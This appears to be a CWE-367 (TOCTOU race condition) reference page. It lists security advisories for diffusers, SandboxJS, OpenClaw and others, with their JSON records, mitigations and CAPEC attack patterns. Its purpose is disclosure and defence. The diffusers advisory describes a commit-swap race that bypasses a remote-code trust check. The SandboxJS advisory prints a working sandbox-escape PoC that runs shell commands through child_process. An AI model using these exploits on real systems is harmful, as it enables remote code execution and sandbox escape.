CWE-367
AllowedTime-of-check Time-of-use (TOCTOU) Race Condition
Abstraction: Base · Status: Incomplete
The product checks the state of a resource before using that resource, but the resource's state can change between the check and the use in a way that invalidates the results of the check.
1070 vulnerabilities reference this CWE, most recent first.
GHSA-7WX4-6VFF-V64P
Vulnerability from github – Published: 2026-05-20 15:31 – Updated: 2026-05-20 15:31Background
This vulnerability is found in the diffusers package - the transformers-equivalent library for diffusion models.
It is found in the DiffusionPipeline.from_pretrained flow, which is used to load a pipeline from the HuggingFace Hub.
This function has a trust_remote_code guard: if the repository’s model_index.json references a custom pipeline class defined in a .py file in the repo, the load is blocked unless trust_remote_code=True is explicitly passed:
ValueError: The repository for attacker/repo contains custom code in pipeline.py
which must be executed to correctly load the model. You can inspect the repository
content at https://hf.co/attacker/repo/blob/main/pipeline.py.
Please pass the argument `trust_remote_code=True` to allow custom code to be run.
The vulnerability allows arbitrary code execution through the custom pipeline flow from a Hub repo, with no custom_pipeline or trust_remote_code kwargs passed. The from_pretrained call succeeds and returns a functional pipeline.
Naive Flow
DiffusionPipeline.from_pretrained begins by popping all relevant arguments from kwargs into local variables, then calls DiffusionPipeline.download() to fetch the repo files:
# pipeline_utils.py:853
cached_folder = cls.download(
pretrained_model_name_or_path,
...
custom_pipeline=custom_pipeline,
trust_remote_code=trust_remote_code,
...
)
Inside download(), model_index.json is fetched first as a standalone file via hf_hub_download:
# pipeline_utils.py:1636
config_file = hf_hub_download(
pretrained_model_name,
cls.config_name,
...
)
config_dict = cls._dict_from_json_file(config_file)
This config is used to detect custom pipeline code and enforce the trust check:
# pipeline_utils.py:1672
if custom_pipeline is None and isinstance(config_dict["_class_name"], (list, tuple)):
custom_pipeline = config_dict["_class_name"][0]
load_pipe_from_hub = custom_pipeline is not None and f"{custom_pipeline}.py" in filenames
if load_pipe_from_hub and not trust_remote_code:
raise ValueError(...)
After the check passes, snapshot_download then fetches all files and saves them to disk:
# pipeline_utils.py:1778
cached_folder = snapshot_download(
pretrained_model_name,
...
revision=revision,
allow_patterns=allow_patterns,
...
)
Back in from_pretrained, the config is read a second time from the downloaded snapshot, and_resolve_custom_pipeline_and_cls reads the config to re-check if custom code needs to be loaded:
# pipeline_loading_utils.py:974
def _resolve_custom_pipeline_and_cls(folder, config, custom_pipeline):
custom_class_name = None
if os.path.isfile(os.path.join(folder, f"{custom_pipeline}.py")):
custom_pipeline = os.path.join(folder, f"{custom_pipeline}.py")
elif isinstance(config["_class_name"], (list, tuple)) and os.path.isfile(
os.path.join(folder, f"{config['_class_name'][0]}.py")
):
custom_pipeline = os.path.join(folder, f"{config['_class_name'][0]}.py")
custom_class_name = config["_class_name"][1]
return custom_pipeline, custom_class_name
If the config points to a .py file, it is imported.
The Vulnerability
hf_hub_download and snapshot_download are two independent HTTP calls to the Hub, both resolving the repository’s default branch (if revision=None) to its current HEAD at call time. There is no atomicity guarantee between them - if the repository is updated between the two calls, they will resolve to different commits and download different content, with no warning displayed to the user.
The trust check in download() operates on the content fetched by hf_hub_download (commit A). The snapshot_download call that immediately follows can silently fetch a newer commit (commit B). The config in the newer commit will be the one parsed by _resolve_custom_pipeline_and_cls.
Therefore, it’s possible to introduce remote code into the repo between the two calls, bypassing the trust check.
The race window is everything between the two Hub calls inside download():
# pipeline_utils.py:1636
config_file = hf_hub_download(...) # ← sees commit A, trust check passes
# ... filenames processing, pattern building, pipeline_is_cached check ...
# ~~~ ATTACKER PUSHES COMMIT B HERE ~~~
# pipeline_utils.py:1778
cached_folder = snapshot_download(...) # ← sees commit B, downloads pipeline.py
For the exploit, commit A carries a clean config with _class_name as a plain string, which causes load_pipe_from_hub to be False and the trust check to pass. Commit B changes _class_name to a list and adds pipeline.py:
Commit A - model_index.json:
{
"_class_name": "FluxPipeline",
"_diffusers_version": "0.31.0"
}
Commit B - model_index.json:
{
"_class_name": ["pipeline", "FluxPipeline"],
"_diffusers_version": "0.31.0"
}
When from_pretrained reads the snapshot after download() returns, config["_class_name"] is now a list, pipeline.py exists on disk (fetched by snapshot_download), and _resolve_custom_pipeline_and_cls resolves custom_pipeline to the local path of that file. _get_pipeline_class then imports it - with no trust check at this point in the code.
PoC
- Create a Hub repo with commit A’s
model_index.json(plain string_class_name). - Run
DiffusionPipeline.from_pretrained("attacker/repo")with a breakpoint set atpipeline_utils.py:1778(thesnapshot_downloadcall). This is for the window to be large enough to manually respond to it. - When execution pauses at the breakpoint, push commit B: update
model_index.jsonto use a list_class_nameand addpipeline.py. - Resume execution.
snapshot_downloadfetches commit B;/tmp/pwnedis written during the subsequent_get_pipeline_classcall.
Constraints
- Does not apply when
revisionis pinned to a specific commit hash - both Hub calls resolve to the same content. - Does not apply when loading from a local directory.
- If all expected files are already present in the local HF cache,
download()returns early before reachingsnapshot_download(line 1767 early-return), closing the race window. The exploit therefore requires a first (or forced) download.
Exploitability
The window between the two calls is very short. Local testing resulted in a window of approximately ~0.5 seconds for the attacker to push the change. This is, of course, unfeasible to accomplish for each and every new download. However, given a popular repo with many downloads per day, one may achieve statistical success by changing the repo’s state every once in a while or every few seconds, with some percentage of downloaders falling on the exact window.
Impact
The vulnerability is a silent RCE - it allows arbitrary code to be loaded through the custom pipeline flow from a Hub repo, with no custom_pipeline or trust_remote_code kwargs. The from_pretrained call succeeds and returns a fully functional pipeline.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "diffusers"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.38.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-45804"
],
"database_specific": {
"cwe_ids": [
"CWE-367"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-20T15:31:33Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "## Background\n\nThis vulnerability is found in the `diffusers` package - the `transformers`-equivalent library for diffusion models.\n\nIt is found in the `DiffusionPipeline.from_pretrained` flow, which is used to load a pipeline from the HuggingFace Hub.\n\nThis function has a `trust_remote_code` guard: if the repository\u2019s `model_index.json` references a custom pipeline class defined in a `.py` file in the repo, the load is blocked unless `trust_remote_code=True` is explicitly passed:\n\n```\nValueError: The repository for attacker/repo contains custom code in pipeline.py\nwhich must be executed to correctly load the model. You can inspect the repository\ncontent at https://hf.co/attacker/repo/blob/main/pipeline.py.\nPlease pass the argument `trust_remote_code=True` to allow custom code to be run.\n```\n\nThe vulnerability allows arbitrary code execution through the custom pipeline flow from a Hub repo, with no `custom_pipeline` or `trust_remote_code` kwargs passed. The `from_pretrained` call succeeds and returns a functional pipeline.\n\n---\n\n## Naive Flow\n\n`DiffusionPipeline.from_pretrained` begins by popping all relevant arguments from `kwargs` into local variables, then calls `DiffusionPipeline.download()` to fetch the repo files:\n\n```python\n# pipeline_utils.py:853\ncached_folder = cls.download(\n pretrained_model_name_or_path,\n ...\n custom_pipeline=custom_pipeline,\n trust_remote_code=trust_remote_code,\n ...\n)\n```\n\nInside `download()`, `model_index.json` is fetched first as a standalone file via `hf_hub_download`:\n\n```python\n# pipeline_utils.py:1636\nconfig_file = hf_hub_download(\n pretrained_model_name,\n cls.config_name,\n ...\n)\nconfig_dict = cls._dict_from_json_file(config_file)\n```\n\nThis config is used to detect custom pipeline code and enforce the trust check:\n\n```python\n# pipeline_utils.py:1672\nif custom_pipeline is None and isinstance(config_dict[\"_class_name\"], (list, tuple)):\n custom_pipeline = config_dict[\"_class_name\"][0]\n\nload_pipe_from_hub = custom_pipeline is not None and f\"{custom_pipeline}.py\" in filenames\n\nif load_pipe_from_hub and not trust_remote_code:\n raise ValueError(...)\n```\n\nAfter the check passes, `snapshot_download` then fetches all files and saves them to disk:\n\n```python\n# pipeline_utils.py:1778\ncached_folder = snapshot_download(\n pretrained_model_name,\n ...\n revision=revision,\n allow_patterns=allow_patterns,\n ...\n)\n```\n\nBack in `from_pretrained`, the config is read a second time from the downloaded snapshot, and`_resolve_custom_pipeline_and_cls` reads the config to re-check if custom code needs to be loaded:\n\n```python\n# pipeline_loading_utils.py:974\ndef _resolve_custom_pipeline_and_cls(folder, config, custom_pipeline):\n custom_class_name = None\n if os.path.isfile(os.path.join(folder, f\"{custom_pipeline}.py\")):\n custom_pipeline = os.path.join(folder, f\"{custom_pipeline}.py\")\n elif isinstance(config[\"_class_name\"], (list, tuple)) and os.path.isfile(\n os.path.join(folder, f\"{config[\u0027_class_name\u0027][0]}.py\")\n ):\n custom_pipeline = os.path.join(folder, f\"{config[\u0027_class_name\u0027][0]}.py\")\n custom_class_name = config[\"_class_name\"][1]\n\n return custom_pipeline, custom_class_name\n```\n\nIf the config points to a `.py` file, it is imported.\n\n---\n\n## The Vulnerability\n\n`hf_hub_download` and `snapshot_download` are two independent HTTP calls to the Hub, both resolving the repository\u2019s default branch (if `revision=None`) to its current HEAD at call time. There is no atomicity guarantee between them - if the repository is updated between the two calls, they will resolve to different commits and download different content, with no warning displayed to the user.\n\nThe trust check in `download()` operates on the content fetched by `hf_hub_download` (commit A). The `snapshot_download` call that immediately follows can silently fetch a newer commit (commit B). The config in the newer commit will be the one parsed by `_resolve_custom_pipeline_and_cls`.\n\n**Therefore, it\u2019s possible to introduce remote code into the repo between the two calls, bypassing the trust check.**\n\nThe race window is everything between the two Hub calls inside `download()`:\n\n```python\n# pipeline_utils.py:1636\nconfig_file = hf_hub_download(...) # \u2190 sees commit A, trust check passes\n\n# ... filenames processing, pattern building, pipeline_is_cached check ...\n# ~~~ ATTACKER PUSHES COMMIT B HERE ~~~\n\n# pipeline_utils.py:1778\ncached_folder = snapshot_download(...) # \u2190 sees commit B, downloads pipeline.py\n```\n\nFor the exploit, commit A carries a clean config with `_class_name` as a plain string, which causes `load_pipe_from_hub` to be `False` and the trust check to pass. Commit B changes `_class_name` to a list and adds `pipeline.py`:\n\n**Commit A - `model_index.json`:**\n\n```json\n{\n \"_class_name\": \"FluxPipeline\",\n \"_diffusers_version\": \"0.31.0\"\n}\n```\n\n**Commit B - `model_index.json`:**\n\n```json\n{\n \"_class_name\": [\"pipeline\", \"FluxPipeline\"],\n \"_diffusers_version\": \"0.31.0\"\n}\n```\n\nWhen `from_pretrained` reads the snapshot after `download()` returns, `config[\"_class_name\"]` is now a list, `pipeline.py` exists on disk (fetched by `snapshot_download`), and `_resolve_custom_pipeline_and_cls` resolves `custom_pipeline` to the local path of that file. `_get_pipeline_class` then imports it - with no trust check at this point in the code.\n\n---\n\n## PoC\n\n1. Create a Hub repo with commit A\u2019s `model_index.json` (plain string `_class_name`).\n2. Run `DiffusionPipeline.from_pretrained(\"attacker/repo\")` with a breakpoint set at `pipeline_utils.py:1778` (the `snapshot_download` call). This is for the window to be large enough to manually respond to it.\n3. When execution pauses at the breakpoint, push commit B: update `model_index.json` to use a list `_class_name` and add `pipeline.py`.\n4. Resume execution.\n5. `snapshot_download` fetches commit B; `/tmp/pwned` is written during the subsequent `_get_pipeline_class` call.\n\n---\n\n## Constraints\n\n- Does not apply when `revision` is pinned to a specific commit hash - both Hub calls resolve to the same content.\n- Does not apply when loading from a local directory.\n- If all expected files are already present in the local HF cache, `download()` returns early before reaching `snapshot_download` (line 1767 early-return), closing the race window. The exploit therefore requires a first (or forced) download.\n\n---\n\n## Exploitability\n\nThe window between the two calls is very short. Local testing resulted in a window of approximately ~0.5 seconds for the attacker to push the change. This is, of course, unfeasible to accomplish for each and every new download. However, given a popular repo with many downloads per day, one may achieve **statistical success** by changing the repo\u2019s state every once in a while or every few seconds, with some percentage of downloaders falling on the exact window. \n\n---\n\n## Impact\n\nThe vulnerability is a silent RCE - it allows arbitrary code to be loaded through the custom pipeline flow from a Hub repo, with no `custom_pipeline` or `trust_remote_code` kwargs. The `from_pretrained` call succeeds and returns a fully functional pipeline.",
"id": "GHSA-7wx4-6vff-v64p",
"modified": "2026-05-20T15:31:33Z",
"published": "2026-05-20T15:31:33Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/huggingface/diffusers/security/advisories/GHSA-7wx4-6vff-v64p"
},
{
"type": "PACKAGE",
"url": "https://github.com/huggingface/diffusers"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Diffusers: TOCTOU Trust Remote Code Bypass"
}
GHSA-7X3H-RM86-3342
Vulnerability from github – Published: 2026-02-05 21:33 – Updated: 2026-02-06 21:42Summary
A sandbox escape vulnerabilities due to a mismatch between the key on which the validation is performed and the key used for accessing properties.
Details
Even though the key used in property accesses (b in the code below) is annotated as string, this is never enforced:
https://github.com/nyariv/SandboxJS/blob/6103d7147c4666fe48cfda58a4d5f37005b43754/src/executor.ts#L304-L304
So, attackers can pass malicious objects that coerce to different string values when used, e.g., one for the time the key is sanitized using hasOwnProperty(key) and a different one for when the key is used for the actual property access.
PoC
const Sandbox = require('@nyariv/sandboxjs').default;
const code = `
let a = new Map;
a.x = 23;
let count = 0;
let nastyProp = {toString: () => {if (count<1){count++;return "x"} else return "__proto__"}}
let mapProt = a[nastyProp];
mapProt.has = isFinite;
console.log(
isFinite.constructor(
"return process.getBuiltinModule('child_process').execSync('ls -lah').toString()",
)(),
);`;
const scope = {};
const sandbox = new Sandbox();
const exec = sandbox.compile(code);
exec(scope).run();
Impact
Remote code execution, if attacker can execute code inside the sandbox.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.8.28"
},
"package": {
"ecosystem": "npm",
"name": "@nyariv/sandboxjs"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.8.29"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-25641"
],
"database_specific": {
"cwe_ids": [
"CWE-367",
"CWE-74"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-05T21:33:04Z",
"nvd_published_at": "2026-02-06T20:16:11Z",
"severity": "CRITICAL"
},
"details": "### Summary\nA sandbox escape vulnerabilities due to a mismatch between the key on which the validation is performed and the key used for accessing properties.\n\n### Details\nEven though the key used in property accesses (```b``` in the code below) is annotated as ```string```, this is never enforced:\nhttps://github.com/nyariv/SandboxJS/blob/6103d7147c4666fe48cfda58a4d5f37005b43754/src/executor.ts#L304-L304\nSo, attackers can pass malicious objects that coerce to different string values when used, e.g., one for the time the key is sanitized using ```hasOwnProperty(key)``` and a different one for when the key is used for the actual property access.\n\n### PoC\n```js\nconst Sandbox = require(\u0027@nyariv/sandboxjs\u0027).default;\n\nconst code = `\nlet a = new Map;\na.x = 23;\nlet count = 0;\n\nlet nastyProp = {toString: () =\u003e {if (count\u003c1){count++;return \"x\"} else return \"__proto__\"}}\nlet mapProt = a[nastyProp];\nmapProt.has = isFinite;\nconsole.log(\n isFinite.constructor(\n \"return process.getBuiltinModule(\u0027child_process\u0027).execSync(\u0027ls -lah\u0027).toString()\",\n )(),\n);`;\nconst scope = {};\nconst sandbox = new Sandbox();\nconst exec = sandbox.compile(code);\nexec(scope).run(); \n```\n\n### Impact\nRemote code execution, if attacker can execute code inside the sandbox.",
"id": "GHSA-7x3h-rm86-3342",
"modified": "2026-02-06T21:42:58Z",
"published": "2026-02-05T21:33:04Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/nyariv/SandboxJS/security/advisories/GHSA-7x3h-rm86-3342"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25641"
},
{
"type": "WEB",
"url": "https://github.com/nyariv/SandboxJS/commit/67cb186c41c78c51464f70405504e8ef0a6e43c3"
},
{
"type": "PACKAGE",
"url": "https://github.com/nyariv/SandboxJS"
},
{
"type": "WEB",
"url": "https://github.com/nyariv/SandboxJS/blob/6103d7147c4666fe48cfda58a4d5f37005b43754/src/executor.ts#L304-L304"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "@nyariv/sandboxjs vulnerable to sandbox escape via TOCTOU bug on keys in property accesses"
}
GHSA-7XMQ-G46G-F8PV
Vulnerability from github – Published: 2026-03-02 21:55 – Updated: 2026-03-02 21:55Summary
Sandbox media handling had a time-of-check/time-of-use gap: media paths could be validated first and read later through a separate path. A symlink retarget between those steps could cause reads outside sandboxRoot.
Impact
Affected versions could permit host file reads outside the intended sandbox root in media attachment/image flows.
Fix
Media reads now use consolidated root-scoped, boundary-safe read paths at use time, removing check/use drift across call sites.
Affected and Patched Versions
- Affected:
<= 2026.2.26 - Patched:
2026.3.1
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "openclaw"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2026.3.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-367",
"CWE-59"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-02T21:55:47Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\nSandbox media handling had a time-of-check/time-of-use gap: media paths could be validated first and read later through a separate path. A symlink retarget between those steps could cause reads outside `sandboxRoot`.\n\n### Impact\nAffected versions could permit host file reads outside the intended sandbox root in media attachment/image flows.\n\n### Fix\nMedia reads now use consolidated root-scoped, boundary-safe read paths at use time, removing check/use drift across call sites.\n\n### Affected and Patched Versions\n- Affected: `\u003c= 2026.2.26`\n- Patched: `2026.3.1`",
"id": "GHSA-7xmq-g46g-f8pv",
"modified": "2026-03-02T21:55:47Z",
"published": "2026-03-02T21:55:47Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-7xmq-g46g-f8pv"
},
{
"type": "PACKAGE",
"url": "https://github.com/openclaw/openclaw"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "OpenClaw: Sandbox media TOCTOU could read files outside sandbox root"
}
GHSA-826P-JRW2-FVW7
Vulnerability from github – Published: 2022-05-24 17:08 – Updated: 2026-06-22 21:30An issue was discovered in MISP before 2.4.121. It mishandled time skew (between the machine hosting the web server and the machine hosting the database) when trying to block a brute-force series of invalid requests.
{
"affected": [],
"aliases": [
"CVE-2020-8890"
],
"database_specific": {
"cwe_ids": [
"CWE-367"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2020-02-12T00:15:00Z",
"severity": "MODERATE"
},
"details": "An issue was discovered in MISP before 2.4.121. It mishandled time skew (between the machine hosting the web server and the machine hosting the database) when trying to block a brute-force series of invalid requests.",
"id": "GHSA-826p-jrw2-fvw7",
"modified": "2026-06-22T21:30:41Z",
"published": "2022-05-24T17:08:50Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-8890"
},
{
"type": "WEB",
"url": "https://github.com/MISP/MISP/commit/934c82819237b4edf1da64587b72a87bec5dd520"
},
{
"type": "WEB",
"url": "https://github.com/MISP/MISP/commit/c1a0b3b2809b21b4df8c1efbc803aff700e262c3"
},
{
"type": "WEB",
"url": "https://github.com/MISP/MISP/compare/v2.4.120...v2.4.121"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-82HW-Q3R9-Q2HC
Vulnerability from github – Published: 2024-02-13 18:38 – Updated: 2024-02-13 18:38Windows Kernel Security Feature Bypass Vulnerability
{
"affected": [],
"aliases": [
"CVE-2024-21362"
],
"database_specific": {
"cwe_ids": [
"CWE-367"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-02-13T18:15:53Z",
"severity": "MODERATE"
},
"details": "Windows Kernel Security Feature Bypass Vulnerability",
"id": "GHSA-82hw-q3r9-q2hc",
"modified": "2024-02-13T18:38:23Z",
"published": "2024-02-13T18:38:23Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21362"
},
{
"type": "WEB",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21362"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-83R6-96M8-R52P
Vulnerability from github – Published: 2026-06-12 12:31 – Updated: 2026-06-12 15:30A race condition in AbstractOAuthDataProvider allows concurrent requests using the same Refresh Token to bypass single-use semantics and generate multiple valid Access Tokens, when 'recycleRefreshTokens' is set to false. A leaked refresh token can be replayed concurrently by multiple attackers or threads. Users are recommended to upgrade to versions 4.2.2 or 4.1.7, which fixes this issue.
{
"affected": [],
"aliases": [
"CVE-2026-50631"
],
"database_specific": {
"cwe_ids": [
"CWE-367"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-06-12T10:16:23Z",
"severity": "HIGH"
},
"details": "A race condition in AbstractOAuthDataProvider allows concurrent requests using the same Refresh Token to bypass single-use semantics and generate multiple valid Access Tokens, when \u0027recycleRefreshTokens\u0027 is set to false. A leaked refresh token can be replayed concurrently by multiple attackers or threads.\u00a0Users are recommended to upgrade to versions 4.2.2 or 4.1.7, which fixes this issue.",
"id": "GHSA-83r6-96m8-r52p",
"modified": "2026-06-12T15:30:34Z",
"published": "2026-06-12T12:31:33Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-50631"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread/s83t3x4r626o9h8rt0ryr1w7w53l1vv8"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2026/06/11/8"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-83W9-H5WV-J9XM
Vulnerability from github – Published: 2026-07-02 16:23 – Updated: 2026-07-02 16:23Summary
Node pairing reconnection could confuse approval scope state. In affected versions, a paired or reconnecting node session could mutate pairing state in a way that changed the approval scope decision.
This advisory is scoped to the named feature and configuration. It does not change OpenClaw's trusted-operator model: authenticated Gateway operators, installed plugins, and intentional local execution surfaces remain trusted unless a separate policy, approval, allowlist, sandbox, or auth boundary is crossed.
Impact
When the affected feature is enabled and reachable, this could restore or present broader node authority than the operator intended. Practical impact depends on the operator's configuration and whether lower-trust input can reach that path.
Patched Versions
The first stable patched version is 2026.5.27.
Mitigations
revoke unexpected node pairings and re-pair only trusted nodes until patched. As general hardening, keep channel and tool allowlists narrow, avoid sharing one Gateway between mutually untrusted users, and disable the affected feature when it is not needed.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "openclaw"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2026.5.27"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-367"
],
"github_reviewed": true,
"github_reviewed_at": "2026-07-02T16:23:41Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\n\nNode pairing reconnection could confuse approval scope state. In affected versions, a paired or reconnecting node session could mutate pairing state in a way that changed the approval scope decision.\n\nThis advisory is scoped to the named feature and configuration. It does not change OpenClaw\u0027s trusted-operator model: authenticated Gateway operators, installed plugins, and intentional local execution surfaces remain trusted unless a separate policy, approval, allowlist, sandbox, or auth boundary is crossed.\n\n### Impact\n\nWhen the affected feature is enabled and reachable, this could restore or present broader node authority than the operator intended. Practical impact depends on the operator\u0027s configuration and whether lower-trust input can reach that path.\n\n### Patched Versions\n\nThe first stable patched version is `2026.5.27`.\n\n### Mitigations\n\nrevoke unexpected node pairings and re-pair only trusted nodes until patched. As general hardening, keep channel and tool allowlists narrow, avoid sharing one Gateway between mutually untrusted users, and disable the affected feature when it is not needed.",
"id": "GHSA-83w9-h5wv-j9xm",
"modified": "2026-07-02T16:23:41Z",
"published": "2026-07-02T16:23:41Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-83w9-h5wv-j9xm"
},
{
"type": "PACKAGE",
"url": "https://github.com/openclaw/openclaw"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "OpenClaw: Node pairing reconnection could confuse approval scope state"
}
GHSA-8439-JWP7-67HH
Vulnerability from github – Published: 2022-10-11 12:00 – Updated: 2022-10-12 12:00A Time-of-Check Time-Of-Use vulnerability in the Trend Micro Apex One Vulnerability Protection integrated component could allow a local attacker to escalate privileges and turn a specific working directory into a mount point on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.
{
"affected": [],
"aliases": [
"CVE-2022-41744"
],
"database_specific": {
"cwe_ids": [
"CWE-367"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-10-10T21:15:00Z",
"severity": "HIGH"
},
"details": "A Time-of-Check Time-Of-Use vulnerability in the Trend Micro Apex One Vulnerability Protection integrated component could allow a local attacker to escalate privileges and turn a specific working directory into a mount point on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.",
"id": "GHSA-8439-jwp7-67hh",
"modified": "2022-10-12T12:00:23Z",
"published": "2022-10-11T12:00:48Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41744"
},
{
"type": "WEB",
"url": "https://success.trendmicro.com/solution/000291645"
},
{
"type": "WEB",
"url": "https://www.zerodayinitiative.com/advisories/ZDI-22-1404"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-845M-9J3R-JHFG
Vulnerability from github – Published: 2022-05-24 17:32 – Updated: 2022-05-24 17:32A memory corruption issue was addressed with improved memory handling. This issue is fixed in macOS Catalina 10.15.6. A malicious application may be able to execute arbitrary code with system privileges.
{
"affected": [],
"aliases": [
"CVE-2020-9921"
],
"database_specific": {
"cwe_ids": [
"CWE-367"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2020-10-22T19:15:00Z",
"severity": "HIGH"
},
"details": "A memory corruption issue was addressed with improved memory handling. This issue is fixed in macOS Catalina 10.15.6. A malicious application may be able to execute arbitrary code with system privileges.",
"id": "GHSA-845m-9j3r-jhfg",
"modified": "2022-05-24T17:32:08Z",
"published": "2022-05-24T17:32:08Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-9921"
},
{
"type": "WEB",
"url": "https://support.apple.com/kb/HT211289"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-86GR-W4V6-64RV
Vulnerability from github – Published: 2026-01-07 12:31 – Updated: 2026-01-07 12:31Memory corruption while handling sensor utility operations.
{
"affected": [],
"aliases": [
"CVE-2025-47344"
],
"database_specific": {
"cwe_ids": [
"CWE-367"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-01-07T12:17:03Z",
"severity": "MODERATE"
},
"details": "Memory corruption while handling sensor utility operations.",
"id": "GHSA-86gr-w4v6-64rv",
"modified": "2026-01-07T12:31:24Z",
"published": "2026-01-07T12:31:24Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-47344"
},
{
"type": "WEB",
"url": "https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2026-bulletin.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation
The most basic advice for TOCTOU vulnerabilities is to not perform a check before the use. This does not resolve the underlying issue of the execution of a function on a resource whose state and identity cannot be assured, but it does help to limit the false sense of security given by the check.
Mitigation
When the file being altered is owned by the current user and group, set the effective gid and uid to that of the current user and group when executing this statement.
Mitigation
Limit the interleaving of operations on files from multiple processes.
Mitigation
If you cannot perform operations atomically and you must share access to the resource between multiple processes or threads, then try to limit the amount of time (CPU cycles) between the check and use of the resource. This will not fix the problem, but it could make it more difficult for an attack to succeed.
Mitigation
Recheck the resource after the use call to verify that the action was taken appropriately.
Mitigation
Ensure that some environmental locking mechanism can be used to protect resources effectively.
Mitigation
Ensure that locking occurs before the check, as opposed to afterwards, such that the resource, as checked, is the same as it is when in use.
CAPEC-27: Leveraging Race Conditions via Symbolic Links
This attack leverages the use of symbolic links (Symlinks) in order to write to sensitive files. An attacker can create a Symlink link to a target file not otherwise accessible to them. When the privileged program tries to create a temporary file with the same name as the Symlink link, it will actually write to the target file pointed to by the attackers' Symlink link. If the attacker can insert malicious content in the temporary file they will be writing to the sensitive file by using the Symlink. The race occurs because the system checks if the temporary file exists, then creates the file. The attacker would typically create the Symlink during the interval between the check and the creation of the temporary file.
CAPEC-29: Leveraging Time-of-Check and Time-of-Use (TOCTOU) Race Conditions
This attack targets a race condition occurring between the time of check (state) for a resource and the time of use of a resource. A typical example is file access. The adversary can leverage a file access race condition by "running the race", meaning that they would modify the resource between the first time the target program accesses the file and the time the target program uses the file. During that period of time, the adversary could replace or modify the file, causing the application to behave unexpectedly.